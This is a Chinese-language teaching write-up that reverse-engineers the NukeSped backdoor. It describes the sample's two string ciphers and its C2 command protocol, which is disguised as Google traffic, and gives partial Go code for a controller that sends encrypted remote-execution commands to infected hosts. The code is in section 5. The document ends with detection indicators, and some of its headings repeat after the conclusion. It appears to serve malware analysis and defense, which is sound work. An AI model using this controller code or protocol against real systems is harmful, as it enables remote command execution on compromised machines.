NukeSped后门逆向分析与控制端构建教学文档<\/h1>

1. 概述<\/h2>
NukeSped是朝鲜Andariel组织使用的一款后门程序，最新变种被发现利用Apache ActiveMQ漏洞(CVE-2023-46604)进行传播。该后门将通信流量伪装为正常的谷歌通信流量，增加了检测难度。<\/p>

2. 样本分析<\/h2>

2.1 样本基本信息<\/h3>

样本类型：NukeSped Variant - Type 1<\/li>
MD5哈希：7699ba4eab5837a4ad9d5d6bbedffc18<\/li>

主要功能：下载文件、执行命令和终止进程<\/li> <\/ul>

2.2 动态获取API<\/h3>

样本在运行前会动态获取API：<\/p>

使用LoadLibraryA<\/code>和GetProcAddress<\/code>函数<\/li>

API字符串经过加密处理<\/li>
<\/ul>
2.3 加解密算法<\/h3>
算法一：简单异或加密<\/h4>

加密方式：使用0xA1作为异或值，按字节进行异或运算<\/li>
解密示例：
def<\/span> xor_decrypt<\/span>(data):
<\/span><\/span>    return<\/span> bytes([b ^<\/span> 0xA1<\/span> for<\/span> b in<\/span> data])
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
算法二：对称加解密<\/h4>

加密算法：按字节加3，然后取反<\/li>
解密算法：按字节减3，然后取反<\/li>
Go语言实现：
func<\/span> encode<\/span>(buffer<\/span> []byte<\/span>) []byte<\/span> {
<\/span><\/span>    output<\/span> :=<\/span> make([]byte<\/span>, len(buffer<\/span>))
<\/span><\/span>    for<\/span> i<\/span> :=<\/span> 0<\/span>; i<\/span> < len(buffer<\/span>); i<\/span>++<\/span> {
<\/span><\/span>        output<\/span>[i<\/span>] = 3<\/span> +<\/span> ^buffer<\/span>[i<\/span>]
<\/span><\/span>    }
<\/span><\/span>    return<\/span> output<\/span>
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> decode<\/span>(buffer<\/span> []byte<\/span>) []byte<\/span> {
<\/span><\/span>    output<\/span> :=<\/span> make([]byte<\/span>, len(buffer<\/span>))
<\/span><\/span>    for<\/span> i<\/span> :=<\/span> 0<\/span>; i<\/span> < len(buffer<\/span>); i<\/span>++<\/span> {
<\/span><\/span>        output<\/span>[i<\/span>] = ^(buffer<\/span>[i<\/span>] -<\/span> 3<\/span>)
<\/span><\/span>    }
<\/span><\/span>    return<\/span> output<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3. 通信行为分析<\/h2>
3.1 通信模型<\/h3>
后门 → 控制端<\/h4>



命令<\/th>
描述<\/th>
<\/tr>
<\/thead>


10<\/td>
初始连接<\/td>
<\/tr>

30<\/td>
命令执行成功<\/td>
<\/tr>

35<\/td>
命令执行失败<\/td>
<\/tr>
<\/tbody>
<\/table>
控制端 → 后门<\/h4>



命令<\/th>
描述<\/th>
<\/tr>
<\/thead>


11<\/td>
样本自删除<\/td>
<\/tr>

12<\/td>
休眠1小时<\/td>
<\/tr>

30<\/td>
向管道传输数据<\/td>
<\/tr>

33<\/td>
创建进程并返回回显<\/td>
<\/tr>

34<\/td>
终止33指令运行的进程<\/td>
<\/tr>
<\/tbody>
<\/table>
3.2 通信数据格式<\/h3>
上线请求<\/h4>
POST \/login.php HTTP\/1.1
Host: www.google.com
Connection: keep-alive
Cache-Control: max-age=0
Sec-Fetch-Mode: 10
Sec-Fetch-User: S-WIN-XXXXXXX
Sec-Fetch-Dest: 01
<\/code><\/pre>
远控指令33<\/h4>
控制端发送：<\/p>
HTTP\/1.1 200 OK
Content-Type: text\/html
Sec-Fetch-Mode: 33
Content-Length: 18

[加密载荷]
<\/code><\/pre>
后门响应：<\/p>
GET http:\/\/www.google.com\/search?q&cp=0&xssi=t&hl=en&authuser=1&nolsbt=1&dpr=1 HTTP\/1.1
Sec-Fetch-Mode: 30
Content-Length: 00000023
Connection: keep-alive

[加密载荷]
<\/code><\/pre>
其他指令<\/h4>
指令34、11、12格式类似，主要区别在Sec-Fetch-Mode值。<\/p>
4. 功能实现分析<\/h2>
4.1 远控指令33（创建进程）<\/h3>

从响应中提取Sec-Fetch-Mode和Content-Length<\/li>
申请内存（Content-Length+2）<\/li>
提取并解密命令行数据<\/li>
调用CreateProcessA执行命令<\/li>
使用CreatePipe和ReadFile获取回显<\/li>
构建响应数据包并发送<\/li>
<\/ol>
4.2 远控指令34（终止进程）<\/h3>

检查Sec-Fetch-Mode为34且Content-Length为0<\/li>
调用TerminateThread、CloseHandle、TerminateProcess<\/li>
关闭相关句柄<\/li>
<\/ol>
4.3 远控指令30（管道传输）<\/h3>

提取Sec-Fetch-Mode和Content-Length<\/li>
申请内存并解密载荷<\/li>
调用WriteFile向管道传输数据<\/li>
<\/ol>
4.4 远控指令11（自删除）<\/h3>

检查Sec-Fetch-Mode为11且Content-Length为0<\/li>
退出通信循环<\/li>
解密自删除代码字符串<\/li>
在TEMP目录释放自删除bat文件并执行<\/li>
<\/ol>
4.5 远控指令12（休眠）<\/h3>

检查Sec-Fetch-Mode为12且Content-Length为0<\/li>
休眠1小时<\/li>
恢复通信<\/li>
<\/ol>
5. 控制端构建<\/h2>
5.1 Go语言实现要点<\/h3>
主程序结构<\/h4>
func<\/span> main<\/span>() {
<\/span><\/span>    listener<\/span>, err<\/span> :=<\/span> net<\/span>.Listen<\/span>("tcp"<\/span>, address<\/span>+<\/span>":"<\/span>+<\/span>port<\/span>)
<\/span><\/span>    defer<\/span> listener<\/span>.Close<\/span>()
<\/span><\/span>    
<\/span><\/span>    for<\/span> {
<\/span><\/span>        conn<\/span>, err<\/span> :=<\/span> listener<\/span>.Accept<\/span>()
<\/span><\/span>        go<\/span> handle_NukeSped_Connection<\/span>(conn<\/span>)
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> handle_NukeSped_Connection<\/span>(conn<\/span> net<\/span>.Conn<\/span>) {
<\/span><\/span>    defer<\/span> conn<\/span>.Close<\/span>()
<\/span><\/span>    recvdata<\/span> :=<\/span> common<\/span>.RecvHeader<\/span>(conn<\/span>)
<\/span><\/span>    
<\/span><\/span>    \/\/ 命令处理循环
<\/span><\/span><\/span><\/span>    for<\/span> {
<\/span><\/span>        \/\/ 读取用户输入并处理不同指令
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>指令33实现<\/h4>
func<\/span> Command_33<\/span>(conn<\/span> net<\/span>.Conn<\/span>, command<\/span> string<\/span>) {
<\/span><\/span>    sendcommond33<\/span>(conn<\/span>, command<\/span>)
<\/span><\/span>    data_header<\/span> :=<\/span> RecvHeader<\/span>(conn<\/span>)
<\/span><\/span>    data_len<\/span> :=<\/span> \/\/ 从header中提取长度
<\/span><\/span><\/span><\/span>    data_buf<\/span> :=<\/span> recvBuf<\/span>(conn<\/span>, data_len<\/span>)
<\/span><\/span>    fmt<\/span>.Println<\/span>(string(BytesToGB2312<\/span>(data_buf<\/span>)))
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>func<\/span> sendcommond33<\/span>(conn<\/span> net<\/span>.Conn<\/span>, command<\/span> string<\/span>) {
<\/span><\/span>    \/\/ 构建HTTP响应头
<\/span><\/span><\/span><\/span>    response<\/span> :=<\/span> "HTTP\/1.1 200 OK\r\n"<\/span> +<\/span>
<\/span><\/span>                "Content-Type: text\/html\r\n"<\/span> +<\/span>
<\/span><\/span>                "Sec-Fetch-Mode: 33\r\n"<\/span> +<\/span>
<\/span><\/span>                "Content-Length: "<\/span> +<\/span> strconv<\/span>.Itoa<\/span>(len(command<\/span>)+<\/span>1<\/span>) +<\/span> "\r\n\r\n"<\/span>
<\/span><\/span>    
<\/span><\/span>    conn<\/span>.Write<\/span>([]byte(response<\/span>))
<\/span><\/span>    time<\/span>.Sleep<\/span>(2<\/span> *<\/span> time<\/span>.Second<\/span>)
<\/span><\/span>    conn<\/span>.Write<\/span>(encode<\/span>(append([]byte(command<\/span>), byte(00<\/span>))))
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>其他指令实现<\/h4>
类似指令33，主要区别在于：<\/p>

Sec-Fetch-Mode值不同<\/li>
载荷内容不同<\/li>
对于指令34和11，Content-Length为0<\/li>
<\/ul>
6. 调试技巧<\/h2>
6.1 阻塞与非阻塞socket问题<\/h3>

后门使用非阻塞socket<\/li>
调试时需注意recv和send的时序<\/li>
解决方案：

在控制端发送代码处设置断点<\/li>
在后门recv处设置断点<\/li>
步过控制端断点后再继续后门调试<\/li>
<\/ol>
<\/li>
<\/ul>
6.2 编码转换<\/h3>

后门响应可能使用GB2312编码<\/li>
Go语言转换示例：<\/li>
<\/ul>
import<\/span> "golang.org\/x\/text\/encoding\/simplifiedchinese"<\/span>
<\/span><\/span>
<\/span><\/span>func<\/span> BytesToGB2312<\/span>(buffer<\/span> []byte<\/span>) []byte<\/span> {
<\/span><\/span>    decoder<\/span> :=<\/span> simplifiedchinese<\/span>.GB18030<\/span>.NewDecoder<\/span>()
<\/span><\/span>    utf8Bytes<\/span>, err<\/span> :=<\/span> decoder<\/span>.Bytes<\/span>(buffer<\/span>)
<\/span><\/span>    if<\/span> err<\/span> !=<\/span> nil<\/span> {
<\/span><\/span>        log<\/span>.Fatal<\/span>(err<\/span>)
<\/span><\/span>    }
<\/span><\/span>    return<\/span> utf8Bytes<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>7. 总结<\/h2>
NukeSped后门虽然功能相对简单，但其通信伪装技术增加了检测难度。通过分析其通信协议和加解密算法，可以构建有效的控制端进行模拟测试。在实际防御中，应重点关注：<\/p>

异常Google域名的通信<\/li>
特定的HTTP头部字段组合<\/li>
非标准端口上的HTTP通信<\/li>
上述加解密算法的特征检测<\/li>
<\/ol>

NukeSped后门逆向分析与控制端构建教学文档<\/h1>

1. 概述<\/h2> NukeSped是朝鲜Andariel组织使用的一款后门程序，最新变种被发现利用Apache ActiveMQ漏洞(CVE-2023-46604)进行传播。该后门将通信流量伪装为正常的谷歌通信流量，增加了检测难度。<\/p>

2. 样本分析<\/h2>

2.3 加解密算法<\/h3>

3. 通信行为分析<\/h2>

3.1 通信模型<\/h3>

3.2 通信数据格式<\/h3>

其他指令<\/h4> 指令34、11、12格式类似，主要区别在Sec-Fetch-Mode值。<\/p>

4. 功能实现分析<\/h2>

5. 控制端构建<\/h2>

5.1 Go语言实现要点<\/h3>

6. 调试技巧<\/h2>

1. 概述<\/h2>
NukeSped是朝鲜Andariel组织使用的一款后门程序，最新变种被发现利用Apache ActiveMQ漏洞(CVE-2023-46604)进行传播。该后门将通信流量伪装为正常的谷歌通信流量，增加了检测难度。<\/p>

其他指令<\/h4>
指令34、11、12格式类似，主要区别在Sec-Fetch-Mode值。<\/p>